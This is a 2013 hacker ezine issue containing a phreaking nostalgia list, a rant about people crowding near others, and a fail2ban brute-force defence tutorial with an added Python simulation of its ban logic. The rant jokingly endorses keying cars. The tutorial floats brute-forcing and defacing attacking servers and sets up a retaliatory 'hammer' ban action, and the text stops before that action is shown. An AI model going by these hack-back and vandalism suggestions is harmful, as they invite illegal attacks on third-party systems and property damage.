heyday has passed. The days of scanning 080089xxxx to find a voice mail box or a
teleconferencing service are sadly behind us.
Public phone boxes have been replaced with mobile phones, outdials have been
replaced by Google Hangouts. Never mind fucking CompuServe...
With this in mind I would like to present you with a list of things that you may
or may not have done which might remind you of the days when you were a
Phreaker or some such nonsense.
You were a phreaker if you....
had a long distance relationship with someone or something you had never even
seen a picture of,
got a hard on from a dial tone,
tried blue boxing pissed by whistling the 2600 tone down a pay phone,
ran from a phone box that a dial 100 operator was monitoring,
did everything dodgy in a phone box except for having sex, taking drugs or
actually anything cool,
were a little bit smug in the knowledge that the guy that bullied you at school
could be taken down by your elite phone hacking skills,
were in darkcyde,
were out of darkcyde,
got into a feud with darkcyde,
loved darkcyde,
hated darkcyde,
created a beige box,
know why this article refers to coloured boxes,
mourn the loss of phone boxes,
tried undertaking a bizarre experiment with a phone box in a Taipei car park after
one too many (this might just be me),
installed a bluebox tone generator on your DOS system,
loved BBSs,
viewed BT vans with a strong degree of suspicion, perhaps going as far as to
call them the Gestapo,
spent countless hours speaking to people you will never see in your real life,
invented a new box colour in your dreams,
feel incredibly proud that you were part of something genuinely different and
unique,
had a red sore on your ear from pushing the phone receiver too close,
smelled like a phone box,
didn't mind the smell of piss from a phone box,
read this article and smirked to yourself at least once.
Shamelessly to the good old days.
Brakis 2013
Please feel free to get in touch and add your own.
All text contained within this article is intended solely for information and
entertainment purposes. Any legal action or prosecution which results from
anything taken from the article is entirely the responsibility of the reader and
the author takes no responsibility for any legal action, injury or death which
happens as a result of the actions of the reader. This disclaimer applies to all
articles, information and consultation provided by the author. This article
remains the intellectual property of the author. It may be redistributed freely
provided that the article remains intact and all credits, disclaimers and
copyright notices remain attached to the article.
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| Rambles and Rants - Social Herding by Briar |
+------------------------------------------------------------------------------+
Social herding: even if you don't know the term I bet you've experienced the
sensation. You are in a cinema with maybe fifteen or so other people, therefore
there are plenty of other seats available, but what happens when that next couple
arrive? They sit in your row, and not just in your row, oh no, they sit a mere two
seats away from you! That, my minions, is what I call social herding. All that
space and still they have to sit near you, even when you're giving off your
best 'I'm a psycho' vibe. Asshats!
What prompts this need to congregate, I'm told, is an in-built, neanderthalic need
to survive, and how do we survive as a species? Superior numbers, good old group
living. This may indeed be the cause but it still pisses me off that these
individuals allow themselves to become nothing more than bipedal sheep by not
having the self awareness to sit somewhere bloody else!
Now, my temper would subside somewhat if I thought for a minute that the only
reason these woolly jumpers sat next to me was because I had nabbed the prime
viewing position and they were trying to muscle in, but this is not the case. To
prove this to yourselves I suggest you go for a cinema visit in the near future
and choose the absolute worst viewing position, i.e. down on the front row, right
in the middle, and see just how many Dollies baa their apologies as they squeeze
by you for a seat.
Obviously, for this experiment to work you'll have to choose a less than
exceptional film to see so that there are plenty of empty seats, but given some
of the dross that's on, that shouldn't be too difficult.
This phenomenon is not limited to the cinema, oh no, it haunts us elsewhere too.
Can you guess? Yes indeedy, the car park conundrum.
Where, oh where, will I park? I know, I'll squeeze in right between that Mini
and that campervan in my big SUV. And is it because there are no other spaces?
No, that's not it. The Mini and the campervan are the only two cars in the
massive hundred car capacity car park. Is it because I want to deter thieves?
(Although I've never seen the logic in that one, surely more cars just provide
the grand theft auto practitioner with good cover from the cameras??) Anyway,
that's not it either. Oh no, it's just that I don't want my SUV to be lonely;
cars, after all, are social creatures.
Yes, you got it, baa baa black sheep has struck again. You are now totally within
your rights as a fully independent individual to key the fecker's car!
I admit that perhaps this might not be viewed as a wholly constructive way to
deal with the social herding epidemic, but what can I say, sometimes a random act
of vandalism is the only way to go.
So, my minions, the moral of this little rant is: watch it on fecking DVD!
+------------------------------------------------------------------------------+
_.--""--._ ___________ __ ________________ |
/ _ _ \ / _____/ \ / \/ _ \__ ___/___ _____ _____ |
_ ( (_\ /_) ) _ \_____ \\ \/\/ / /_\ \| |_/ __ \\__ \ / \ |
{ \._\ /\ /_./ } / \\ / | \ |\ ___/ / __ \| Y Y \|
/_"=-.}______{.-="_\/_______ / \__/\ /\____|__ /____| \___ >____ /__|_| /|
_ _.=("""")=._ _ \/ \/ \/ \/ \/ \/ |
(_'"_.-"`~~`"-._"'_) Issue 42 - June 2013 |
{_" "_} http://www.swateam.org http://www.swateam.org.uk |
+------------------------------------------------------------------------------+
| Proactive Server Defence |
+------------------------------------------------------------------------------+
It's always good to look through the good old server logs to see what cretin or
bot has tried to get into them. Actually it's a good source for getting access
to a compromised machine, but that's another story.
Anyhow, after looking over reams and reams of failed login attempts I figured,
hell, let's carry out some Google-fu and see what bell-end is attempting to gain
access to my k-rad-uber-proxy server. I mean, let's face it, it's either a bot,
a government or some skid trying to be cool.
One day someone came along from IP address 213.248.110.43 and hammered the
SSH server to try and gain access; a quick Google of the IP address reveals it's
a shared host, probably compromised using one of the same passwords that it tried
to gain access to the proxy with.
So this makes us think: what could we do to prevent such skids attempting it
in the future? I mean, there are a few options available, but we must also look
at the situation. The possibilities are:
1) It was an automated bot, merely adding to the noise of the internet and my
machine was scanned along with thousands of others and it maybe got into
some.
2) It was a direct attack on our network by person or persons unknown.
3) There's nothing in the logs because someone gained access to the system and
cleaned up after themselves.
Situations 2 and 3 are the most worrying, even if it's most likely situation 1.
Now one could go through the logs and run a brute force on the system that
carried out the scan. Once in, all web pages could be defaced, scanning bots
removed, root password changed and server rebooted.
Yes, it would get noticed and cleaned up; a nice flashy colour-clashing page
that screams "beef up your security and stay the fuck away from my servers"
might be all fun and good, but it doesn't really solve the issue, except maybe
in the immediate short term. And it doesn't change the fact that the host could
just have been set up as an attack server to gain access to others.
These attack servers crop up every now and then, and trying to get into them
in the same fashion that they tried will probably fail.
Then there's situation 3: what if they actually got into the server and you
never got to see the logs? They could be in there, backdoor the server and
leech all of your secret porn stash, or even worse, what if they delete it?
Going over the logs is good, but if it only shows you who failed to get into
the machine, then going over it after the fact can be a little pointless.
My plan is to stop them in their tracks. We want to keep an eye open for
any attempt to brute force the server or scan it for exploits; not only do I
want to keep it out of my server(s), I want to prevent and hinder any other
attempts to get into any other system.
Ok, so in order to keep our systems secure we will deploy some software to watch
out for brute force attacks; in this case we will employ fail2ban, which you can
download from http://www.fail2ban.org. This nifty bit of kit will monitor log
files for brute force attempts and block the offending IP addresses. It does
this in real time, so you're not waiting on cron jobs to parse the logs.
It uses Python and doesn't require any other dependencies, although it can
optionally use gamin.
Most distributions come with it these days, for example, while testing on the
pi it's just a case of:
sudo apt-get install fail2ban
Now it's installed, let's mess with the settings and features so we can get
a little nasty with intruders rather than just banning them.
First off we want to create a jail. The jails are basically a set of rules
that fail2ban looks for and what it does in reaction to those rules being
matched.
The most obvious and handiest of these is to add the IP address to iptables
and get all packets from the offending IP address dropped. But we're evil,
so we'll go a little further than that.
First step, copy the default jail file for editing:
sudo cp /etc/fail2ban/jail.conf /etc/fail2ban/jail.local
Now we open the file for editing:
sudo nano /etc/fail2ban/jail.local
Ok, head down to the section that is labelled DEFAULT; this is where you will
specify IPs that will be ignored. This can be the local IP address, or if you
are on a static IP then you can set it here too. This is handy if you're a bit of
a numpty and forget your password more than a few times. If you have multiple
servers then you can add the IP of one in here and use said server to bounce
your connection through if you need to.
You will also specify how long you want the offender banned for and how many
attempts to log in you will allow. Here is what we have:
[DEFAULT]
# "ignoreip" can be an IP address, a CIDR mask or a DNS host
ignoreip = 127.0.0.1/8
bantime = 18000
maxretry = 3
# "backend" specifies the backend used to get files modification. Available
# options are "gamin", "polling" and "auto".
# yoh: For some reason Debian shipped python-gamin didn't work as expected
# This issue left ToDo, so polling is default backend for now
backend = auto
#
# Destination email address used solely for the interpolations in
# jail.{conf,local} configuration files.
destemail = root@localhost.com
Ok, so we have the local IP address allowed; multiple addresses can be entered
and separated with a space. It's always good to have an IP that you can log in
from just in case, after all you won't want to set this off on yourself once
it's up and running. We have set the ban time to 5 hours (18000 seconds); this
is a tad on the long side I know, but I like to be sure; 10 minutes may be more
than enough.
Maxretry speaks for itself, essentially how many failed attempts the system will
accept before banning; 3 is generally the socially accepted standard. Although
if you are paranoid then you can set it to 1, or possibly a few more if you
wanted to be certain it was a bot or whatnot.
Leave backend on auto and enter your email into destemail to get a nice
mail every time an IP address gets banned, assuming that you've set up a mail
server.
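To make the ignoreip / maxretry / bantime settings concrete, here is an added
example (not fail2ban's own code, which lives in its filter.d and action.d
files) that walks a handful of constructed sshd log lines and applies the same
decision fail2ban makes: count "Failed password" hits per source IP inside a
sliding window, skip anything in ignoreip, and record a ban of bantime seconds
once maxretry is reached. The window length is fail2ban's findtime option, which
the jail.local above leaves at its default; the 192.168.1.0/24 ignore entry and
all of the log lines are made up for the example.

```python
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Settings mirroring the [DEFAULT] section above. findtime is fail2ban's
# sliding-window option (seconds within which maxretry failures must occur);
# 192.168.1.0/24 is a constructed "management network" entry, not from the article.
IGNOREIP = ("127.0.0.1/8", "192.168.1.0/24")
BANTIME = 18000   # seconds: 5 hours, as in the article
FINDTIME = 600    # seconds
MAXRETRY = 3

# Constructed sshd lines in syslog format; real auth.log lines look the same.
SAMPLE_AUTH_LOG = """\
Jun  3 10:15:01 proxy sshd[2201]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jun  3 10:15:04 proxy sshd[2201]: Failed password for root from 203.0.113.7 port 51022 ssh2
Jun  3 10:15:07 proxy sshd[2203]: Failed password for invalid user admin from 203.0.113.7 port 51030 ssh2
Jun  3 10:15:09 proxy sshd[2205]: Accepted publickey for alice from 192.168.1.20 port 40110 ssh2
Jun  3 10:15:12 proxy sshd[2207]: Failed password for alice from 192.168.1.20 port 40112 ssh2
Jun  3 10:15:20 proxy sshd[2207]: Failed password for alice from 192.168.1.20 port 40112 ssh2
Jun  3 10:15:25 proxy sshd[2207]: Failed password for alice from 192.168.1.20 port 40112 ssh2
Jun  3 10:15:30 proxy sshd[2209]: Failed password for root from 198.51.100.9 port 3301 ssh2
Jun  3 10:40:00 proxy sshd[2300]: Failed password for root from 198.51.100.9 port 3302 ssh2
Jun  3 10:45:00 proxy sshd[2301]: Failed password for root from 198.51.100.9 port 3303 ssh2
"""

# The same kind of pattern fail2ban's sshd filter uses: a failed password,
# optionally for a user that does not exist, and the source address.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?\S+ from (?P<ip>[0-9a-fA-F.:]+) port \d+"
)


def parse_ts(stamp, year=2013):
    """syslog stamps carry no year, so one is assumed (the article's year here)."""
    return datetime.strptime(f"{year} {stamp}", "%Y %b %d %H:%M:%S")


def is_ignored(ip, ignore_nets=IGNOREIP):
    """True if ip falls inside any ignoreip entry (plain IPs or CIDR masks)."""
    addr = ipaddress.ip_address(ip)
    return any(addr in ipaddress.ip_network(n, strict=False) for n in ignore_nets)


def scan_log(lines, ignoreip=IGNOREIP, maxretry=MAXRETRY,
             findtime=FINDTIME, bantime=BANTIME):
    """Return {ip: (ban_start, ban_end)} for each IP that hit maxretry failures
    within findtime seconds. Successful logins and ignored IPs never count."""
    window = timedelta(seconds=findtime)
    recent = defaultdict(deque)  # ip -> failure timestamps still inside the window
    bans = {}
    for line in lines:
        m = FAILED_RE.match(line)
        if not m:
            continue
        ip, ts = m.group("ip"), parse_ts(m.group("ts"))
        if is_ignored(ip, ignoreip):
            continue
        if ip in bans and ts < bans[ip][1]:
            continue  # still banned; the firewall would have dropped this anyway
        hits = recent[ip]
        hits.append(ts)
        while hits and ts - hits[0] > window:
            hits.popleft()  # failures older than findtime no longer count
        if len(hits) >= maxretry:
            bans[ip] = (ts, ts + timedelta(seconds=bantime))
    return bans


def is_banned(bans, ip, now):
    """Whether ip is inside an active ban at time now."""
    span = bans.get(ip)
    return span is not None and span[0] <= now < span[1]


if __name__ == "__main__":
    for ip, (start, end) in scan_log(SAMPLE_AUTH_LOG.splitlines()).items():
        print(f"ban {ip} from {start:%H:%M:%S} until {end:%H:%M:%S}")
```

Running it bans only 203.0.113.7: three failures in six seconds. The
192.168.1.20 failures are skipped because the address is in ignoreip, which is
exactly why the article says to whitelist an address you can still log in from.
198.51.100.9 also fails three times but spread over half an hour, so no three of
them ever sit inside the 600-second window and it is never banned; lowering
maxretry or raising findtime is how you would catch a slow, patient bot like that.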
Now the next section we will look at in the /etc/fail2ban/jail.local file is
this part:
#
# ACTIONS
#
# Default banning action (e.g. iptables, iptables-new,
# iptables-multiport, shorewall, etc) It is used to define
# action_* variables. Can be overridden globally or per
# section within jail.local file
banaction = iptables-multiport
# email action. Since 0.8.1 upstream fail2ban uses sendmail
# MTA for the mailing. Change mta configuration parameter to mail
# if you want to revert to conventional 'mail'.
mta = sendmail
# Default protocol
protocol = tcp
[...]
Ok, this default entry shows us what action will be called once the offender has
tried to brute force the server; banaction = iptables-multiport refers
to the file /etc/fail2ban/action.d/iptables-multiport.conf.
We will change this to:
banaction = hammer
Now save it and we'll go make a few more changes to the set up. Let's make a
copy of the action file and change a few things in there:
cd /etc/fail2ban/action.d
cp ./iptables-multiport.conf /etc/fail2ban/action.d/hammer.conf
nano /etc/fail2ban/action.d/hammer.conf
Now look for this bit:
# Option: actionban
# Notes.: command executed when banning an IP. Take care that the
# command is executed with Fail2Ban user rights.
# Tags: IP address
# number of failures
#